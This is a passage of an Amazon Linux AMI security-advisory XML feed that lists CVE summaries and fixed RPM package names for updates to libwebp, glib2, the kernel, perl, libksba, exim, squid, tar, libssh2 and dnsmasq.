version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.16-24.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1748</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1748: medium priority package update for libwebp</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 20:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-25013:
A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in ShiftBytes().
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25013" title="" id="CVE-2018-25013" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwebp-devel" version="0.3.0" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-devel-0.3.0-10.9.amzn1.x86_64.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-debuginfo-0.3.0-10.9.amzn1.x86_64.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-0.3.0-10.9.amzn1.x86_64.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-java-0.3.0-10.9.amzn1.x86_64.rpm</filename></package><package name="libwebp-tools" version="0.3.0" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-tools-0.3.0-10.9.amzn1.x86_64.rpm</filename></package><package name="libwebp-tools" version="0.3.0" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-tools-0.3.0-10.9.amzn1.i686.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-debuginfo-0.3.0-10.9.amzn1.i686.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-java-0.3.0-10.9.amzn1.i686.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-0.3.0-10.9.amzn1.i686.rpm</filename></package><package name="libwebp-devel" version="0.3.0" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-devel-0.3.0-10.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1749</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1749: important priority package update for glib2</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 20:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16429:
GNOME GLib 2.56.1 has an out-of-bounds read vulnerability in g_markup_parse_context_parse() in gmarkup.c, related to utf8_str().
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16429" title="" id="CVE-2018-16429" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2-devel" version="2.36.3" release="5.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.24.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.24.amzn1.x86_64.rpm</filename></package><package name="glib2" version="2.36.3" release="5.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.24.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.24.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.24.amzn1.noarch.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.24.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.24.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.24.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" release="5.24.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.24.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.24.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.24.amzn1.i686.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.24.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1750</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1750: important priority package update for kernel</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-32233:
In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32233" title="" id="CVE-2023-32233" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.314-164.539.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1751</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1751: important priority package update for perl</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-31484:
HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484" title="" id="CVE-2023-31484" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-ExtUtils-CBuilder" version="0.28.2.6" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-ExtUtils-CBuilder-0.28.2.6-294.44.amzn1.noarch.rpm</filename></package><package name="perl-Module-Loaded" version="0.08" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-Loaded-0.08-294.44.amzn1.noarch.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-debuginfo-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-macros-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Pod-Escapes-1.04-294.44.amzn1.noarch.rpm</filename></package><package name="perl-CPAN" version="1.9800" release="294.44.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-CPAN-1.9800-294.44.amzn1.noarch.rpm</filename></package><package name="perl-IO-Zlib" version="1.10" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-IO-Zlib-1.10-294.44.amzn1.noarch.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.21" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Locale-Maketext-Simple-0.21-294.44.amzn1.noarch.rpm</filename></package><package name="perl-ExtUtils-Install" version="1.58" release="294.44.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-ExtUtils-Install-1.58-294.44.amzn1.noarch.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.30" release="294.44.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-ExtUtils-Embed-1.30-294.44.amzn1.noarch.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-libs-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-tests-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Time-Piece-1.20.1-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Package-Constants-0.02-294.44.amzn1.noarch.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-devel-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-Object-Accessor" version="0.42" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Object-Accessor-0.42-294.44.amzn1.noarch.rpm</filename></package><package name="perl-core" version="5.16.3" release="294.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-core-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-Module-CoreList" version="2.76.02" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-CoreList-2.76.02-294.44.amzn1.noarch.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.44.amzn1" epoch="4" arch="i686"><filename>Packages/perl-libs-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.44.amzn1" epoch="4" arch="i686"><filename>Packages/perl-devel-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.44.amzn1" epoch="4" arch="i686"><filename>Packages/perl-debuginfo-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.44.amzn1" epoch="4" arch="i686"><filename>Packages/perl-macros-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.44.amzn1" epoch="4" arch="i686"><filename>Packages/perl-tests-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl" version="5.16.3" release="294.44.amzn1" epoch="4" arch="i686"><filename>Packages/perl-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.44.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Time-Piece-1.20.1-294.44.amzn1.i686.rpm</filename></package><package name="perl-core" version="5.16.3" release="294.44.amzn1" epoch="0" arch="i686"><filename>Packages/perl-core-5.16.3-294.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1752</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1752: important priority package update for libksba</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-47629:
Libksba before 1.6.3 is prone to an integer overflow vulnerability in the CRL signature parser.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47629" title="" id="CVE-2022-47629" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libksba-debuginfo" version="1.3.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-debuginfo-1.3.5-1.11.amzn1.x86_64.rpm</filename></package><package name="libksba-devel" version="1.3.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-devel-1.3.5-1.11.amzn1.x86_64.rpm</filename></package><package name="libksba" version="1.3.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-1.3.5-1.11.amzn1.x86_64.rpm</filename></package><package name="libksba-devel" version="1.3.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-devel-1.3.5-1.11.amzn1.i686.rpm</filename></package><package name="libksba" version="1.3.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-1.3.5-1.11.amzn1.i686.rpm</filename></package><package name="libksba-debuginfo" version="1.3.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-debuginfo-1.3.5-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1753</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1753: medium priority package update for exim</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37451:
Exim before 4.96 has an invalid free in pam_converse in auths/call_pam.c because store_free is not used after store_malloc.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37451" title="" id="CVE-2022-37451" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-greylist" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.37.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.37.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.37.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.37.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.37.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1754</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1754: important priority package update for squid</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14058:
An issue was discovered in Squid before 4.12 and 5.x before 5.0.3. Due to use of a potentially dangerous function, Squid and the default certificate validation helper are vulnerable to a Denial of Service when opening a TLS connection to an attacker-controlled server for HTTPS. This occurs because unrecognized error values are mapped to NULL, but later code expects that each error value is mapped to a valid error string.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14058" title="" id="CVE-2020-14058" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.45.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.45.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.45.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.45.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.45.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.45.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.45.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.45.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.45.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.45.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.45.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1755</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1755: medium priority package update for tar</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9923:
pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923" title="" id="CVE-2019-9923" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tar-debuginfo" version="1.26" release="31.24.amzn1" epoch="2" arch="x86_64"><filename>Packages/tar-debuginfo-1.26-31.24.amzn1.x86_64.rpm</filename></package><package name="tar" version="1.26" release="31.24.amzn1" epoch="2" arch="x86_64"><filename>Packages/tar-1.26-31.24.amzn1.x86_64.rpm</filename></package><package name="tar" version="1.26" release="31.24.amzn1" epoch="2" arch="i686"><filename>Packages/tar-1.26-31.24.amzn1.i686.rpm</filename></package><package name="tar-debuginfo" version="1.26" release="31.24.amzn1" epoch="2" arch="i686"><filename>Packages/tar-debuginfo-1.26-31.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1756</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1756: medium priority package update for libssh2</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3860:
An out of bounds read flaw was discovered in libssh2 before 1.8.1 in the way SFTP packets with empty payloads are parsed. A remote attacker who compromises a SSH server may be able to cause a Denial of Service or read data in the client memory.
CVE-2019-3859:
An out of bounds read flaw was discovered in libssh2 before 1.8.1 in the _libssh2_packet_require and _libssh2_packet_requirev functions. A remote attacker who compromises a SSH server may be able to cause a Denial of Service or read data in the client memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3859" title="" id="CVE-2019-3859" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3860" title="" id="CVE-2019-3860" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libssh2" version="1.4.2" release="3.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-1.4.2-3.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-debuginfo-1.4.2-3.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-docs-1.4.2-3.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="3.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-devel-1.4.2-3.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-debuginfo-1.4.2-3.13.amzn1.i686.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="3.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-devel-1.4.2-3.13.amzn1.i686.rpm</filename></package><package name="libssh2" version="1.4.2" release="3.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-1.4.2-3.13.amzn1.i686.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-docs-1.4.2-3.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1757</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1757: important priority package update for squid</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18676:
An issue was discovered in Squid 3.x and 4.x through 4.8. Due to incorrect input validation, there is a heap-based buffer overflow that can result in Denial of Service to all clients using the proxy. Severity is high due to this vulnerability occurring before normal security checks; any remote client that can reach the proxy port can trivially perform the attack via a crafted URI scheme.
CVE-2019-12523:
An issue was discovered in Squid before 4.9. When handling a URN request, a corresponding HTTP request is made. This HTTP request doesn't go through the access checks that incoming HTTP requests go through. This causes all access checks to be bypassed and allows access to restricted HTTP servers, e.g., an attacker can connect to HTTP servers that only listen on localhost.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12523" title="" id="CVE-2019-12523" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18676" title="" id="CVE-2019-18676" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-migration-script" version="3.5.20" release="17.46.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.46.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.46.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.46.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.46.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.46.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.46.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.46.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.46.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.46.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.46.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1758</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1758: medium priority package update for dnsmasq</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-28450:
An issue was discovered in Dnsmasq before 2.90. The default maximum EDNS.0 UDP packet size was set to 4096 but should be 1232 because of DNS Flag Day 2020.
